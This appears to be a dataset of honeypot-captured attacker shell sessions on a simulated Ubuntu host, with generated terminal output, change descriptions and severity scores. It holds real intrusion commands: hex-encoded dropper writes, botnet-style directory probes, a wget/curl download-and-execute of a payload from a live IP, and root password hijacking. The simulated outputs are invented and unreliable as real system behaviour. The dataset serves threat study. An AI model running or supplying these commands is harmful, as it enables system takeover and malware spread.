echo -ne "\x00\x00\x00\x00\x50\x01\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" >> .s
# echo -ne "\x00\x00\x00\x00\x50\x01\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" >> .s #
``` # echo -ne "\x00\x00\x00\x00\x50\x01\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" >> .s # ``` The 'echo -ne "\x00\x00\x00\x00\x50\x01\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" >> .s' command was executed, which appends anothe...
2
curated_ubuntu
f03795006499
2021_2022
18
./.s>.i; chmod 777 .i; ./.i; rm .s; exit
# ./.s>.i; chmod 777 .i; ./.i; rm .s; exit root@ubuntu:~#
``` # ./.s>.i; chmod 777 .i; ./.i; rm .s; exit root@ubuntu:~# ``` The '.s' file was executed and its output was redirected to a new file '.i'. The '.i' file was given full permissions and then executed. The '.s' file was removed. The 'exit' command was executed, but as this is a simulation, the terminal session is stil...
4
curated_ubuntu
cbf2b0b75976
2021_2022
0
ping ; sh
root@ubuntu:~# ping ; sh ping: usage error: Destination address required root@ubuntu:~# sh sh-5.0#
The shell has been changed from bash to sh.
2
curated_ubuntu
cbf2b0b75976
2021_2022
1
/bin/busybox JIGOKU
sh-5.0# /bin/busybox JIGOKU /bin/busybox: applet not found sh-5.0#
No changes to the system.
0
curated_ubuntu
ddf5daf66323
2021_2022
0
>/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:~# >/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/tmp#
- An empty file named '.l' was created in the '/tmp' directory. - The working directory was changed to '/tmp'. - The string 'PATH_DONE' was printed to the terminal.
1
curated_ubuntu
ddf5daf66323
2021_2022
1
>/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/tmp# >/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/var#
- An empty file named '.l' was created in the '/var' directory. - The working directory was changed to '/var'. - The string 'PATH_DONE' was printed to the terminal.
1
curated_ubuntu
ddf5daf66323
2021_2022
2
>/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/var# >/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/dev#
- An empty file named '.l' was created in the '/dev' directory. - The working directory was changed to '/dev'. - The string 'PATH_DONE' was printed to the terminal.
1
curated_ubuntu
ddf5daf66323
2021_2022
3
>/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/dev# >/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/mnt#
- An empty file named '.l' was created in the '/mnt' directory. - The working directory was changed to '/mnt'. - The string 'PATH_DONE' was printed to the terminal.
1
curated_ubuntu
ddf5daf66323
2021_2022
4
>/var/run/.l && cd /var/run/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/mnt# >/var/run/.l && cd /var/run/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/var/run#
- An empty file named '.l' was created in the '/var/run' directory. - The working directory was changed to '/var/run'. - The string 'PATH_DONE' was printed to the terminal.
1
curated_ubuntu
ddf5daf66323
2021_2022
5
>/var/tmp/.l && cd /var/tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/var/run# >/var/tmp/.l && cd /var/tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/var/tmp#
- An empty file named '.l' was created in the '/var/tmp' directory. - The working directory was changed to '/var/tmp'. - The string 'PATH_DONE' was printed to the terminal.
1
curated_ubuntu
ddf5daf66323
2021_2022
6
>/.l && cd /; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/var/tmp# >/.l && cd /; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/#
- An empty file named '.l' was created in the root directory '/'. - The working directory was changed to '/'. - The string 'PATH_DONE' was printed to the terminal.
1
curated_ubuntu
ddf5daf66323
2021_2022
7
>/dev/netslink/.l && cd /dev/netslink/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/# >/dev/netslink/.l && cd /dev/netslink/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/dev/netslink#
- An empty file named '.l' was created in the '/dev/netslink' directory. - The working directory was changed to '/dev/netslink'. - The string 'PATH_DONE' was printed to the terminal.
1
curated_ubuntu
ddf5daf66323
2021_2022
8
>/dev/shm/.l && cd /dev/shm/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/dev/netslink# >/dev/shm/.l && cd /dev/shm/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/dev/shm#
- An empty file named '.l' was created in the '/dev/shm' directory. - The working directory was changed to '/dev/shm'. - The string 'PATH_DONE' was printed to the terminal.
1
curated_ubuntu
ddf5daf66323
2021_2022
9
>/bin/.l && cd /bin/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/dev/shm# >/bin/.l && cd /bin/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/bin#
- An empty file named '.l' was created in the '/bin' directory. - The working directory was changed to '/bin'. - The string 'PATH_DONE' was printed to the terminal.
1
curated_ubuntu
ddf5daf66323
2021_2022
10
>/etc/.l && cd /etc/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/bin# >/etc/.l && cd /etc/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/etc#
- An empty file named '.l' was created in the '/etc' directory. - The working directory was changed to '/etc'. - The string 'PATH_DONE' was printed to the terminal.
1
curated_ubuntu
ddf5daf66323
2021_2022
11
>/boot/.l && cd /boot/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/etc# >/boot/.l && cd /boot/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/boot#
- An empty file named '.l' was created in the '/boot' directory. - The working directory was changed to '/boot'. - The string 'PATH_DONE' was printed to the terminal.
1
curated_ubuntu
ddf5daf66323
2021_2022
12
>/usr/.l && cd /usr/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/boot# >/usr/.l && cd /usr/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/usr#
- An empty file named '.l' was created in the '/usr' directory. - The working directory was changed to '/usr'. - The string 'PATH_DONE' was printed to the terminal.
1
curated_ubuntu
ddf5daf66323
2021_2022
13
>/sys/.l && cd /sys/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld
root@ubuntu:/usr# >/sys/.l && cd /sys/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' || ./helloworld PATH_DONE root@ubuntu:/sys#
- An empty file named '.l' was created in the '/sys' directory. - The working directory was changed to '/sys'. - The string 'PATH_DONE' was printed to the terminal.
1
curated_ubuntu
ddf5daf66323
2021_2022
14
wget --help >/dev/null && echo -e '\x57\x47\x45\x54\x5f\x46\x4f\x55\x4e\x44';curl --help >/dev/null && echo -e '\x43\x55\x52\x4c\x5f\x46\x4f\x55\x4e\x44';ftpget --help >/dev/null && echo -e '\x46\x54\x50\x5f\x46\x4f\x55\x4e\x44'; echo -e '\x45\x43\x48\x4f\x5f\x46\x4f\x55\x4e\x44'
root@ubuntu:/sys# wget --help >/dev/null && echo -e '\x57\x47\x45\x54\x5f\x46\x4f\x55\x4e\x44';curl --help >/dev/null && echo -e '\x43\x55\x52\x4c\x5f\x46\x4f\x55\x4e\x44';ftpget --help >/dev/null && echo -e '\x46\x54\x50\x5f\x46\x4f\x55\x4e\x44'; echo -e '\x45\x43\x48\x4f\x5f\x46\x4f\x55\x4e\x44' WGET_FOUND CURL_FOUND...
No changes to the system were made.
0
curated_ubuntu
ddf5daf66323
2021_2022
15
wget http://2.58.149.116/spc -O- > ntpclient; chmod 777 ntpclient; ./ntpclient test.wget.spc; curl http://2.58.149.116/spc > ntpclient; chmod 777 ntpclient; ./ntpclient test.curl.spc
root@ubuntu:/sys# wget http://2.58.149.116/spc -O- > ntpclient; chmod 777 ntpclient; ./ntpclient test.wget.spc --2023-11-01 03:24:43-- http://2.58.149.116/spc Connecting to 2.58.149.116:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/plain] Saving to: ‘STDOUT’ - ...
- The file 'ntpclient' was downloaded twice from the server with IP '2.58.149.116' using different methods (wget, curl). - The downloaded file was given full permissions and executed twice with different arguments ('test.wget.spc', 'test.curl.spc').
3
curated_ubuntu
ce44972405dc
2021_2022
0
cd /tmp && chmod +x ePxJOVoq && bash -c ./ePxJOVoq
root@ubuntu:~# cd /tmp && chmod +x ePxJOVoq && bash -c ./ePxJOVoq root@tmp:~#
The terminal changed the working directory to '/tmp'. The file 'ePxJOVoq' in the '/tmp' directory was given execute permissions and was executed.
3
curated_ubuntu
ce44972405dc
2021_2022
1
./ePxJOVoq
root@tmp:~# ./ePxJOVoq root@tmp:~#
The file 'ePxJOVoq' in the '/tmp' directory was executed.
3
curated_ubuntu
06f1ea4882d9
2021_2022
0
cat /proc/cpuinfo | grep name | wc -l
root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l 24 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
06f1ea4882d9
2021_2022
1
echo -e "[n0rd574r]\niHqZPXXMXApI\niHqZPXXMXApI"|passwd|bash
root@ubuntu:~# echo -e "[n0rd574r]\niHqZPXXMXApI\niHqZPXXMXApI"|passwd|bash New password: Retype new password: passwd: password updated successfully root@ubuntu:~#
The password for the user '[n0rd574r]' has been changed to 'iHqZPXXMXApI'.
4
curated_ubuntu
06f1ea4882d9
2021_2022
2
echo "[n0rd574r]\niHqZPXXMXApI\niHqZPXXMXApI\n"|passwd
root@ubuntu:~# echo "[n0rd574r]\niHqZPXXMXApI\niHqZPXXMXApI\n"|passwd New password: Retype new password: passwd: password updated successfully root@ubuntu:~#
The password for the user '[n0rd574r]' has been changed again to 'iHqZPXXMXApI'.
4
curated_ubuntu
06f1ea4882d9
2021_2022
3
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
06f1ea4882d9
2021_2022
4
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' 725938364 123456 567890 12345 67890 123456 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
06f1ea4882d9
2021_2022
5
ls -lh $(which ls)
root@ubuntu:~# ls -lh $(which ls) -rwxr-xr-x 1 root root 129K Jan 18 2023 /bin/ls root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
06f1ea4882d9
2021_2022
6
which ls
root@ubuntu:~# which ls /bin/ls root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
06f1ea4882d9
2021_2022
7
crontab -l
root@ubuntu:~# crontab -l No crontab for root root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
06f1ea4882d9
2021_2022
8
w
root@ubuntu:~# w 03:27:46 up 2:00, 1 user, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 192.168.1.100 01:27 2.00s 0.03s 0.00s w root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
06f1ea4882d9
2021_2022
9
uname -m
root@ubuntu:~# uname -m x86_64 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
06f1ea4882d9
2021_2022
10
cat /proc/cpuinfo | grep model | grep name | wc -l
root@ubuntu:~# cat /proc/cpuinfo | grep model | grep name | wc -l 24 root@ubuntu:~#
No changes to the system.
0
curated_ubuntu
06f1ea4882d9
2021_2022
11
top
root@ubuntu:~# top top - 03:30:10 up 2:02, 1 user, load average: 0.00, 0.01, 0.05 Tasks: 133 total, 1 running, 132 sleeping, 0 stopped, 0 zombie %Cpu(s): 0.3 us, 0.1 sy, 0.0 ni, 99.6 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st MiB Mem : 708590.9 total, 705879.3 free, 1890.3 used, 821.3 buff/cache MiB Swap:...
None
0
curated_ubuntu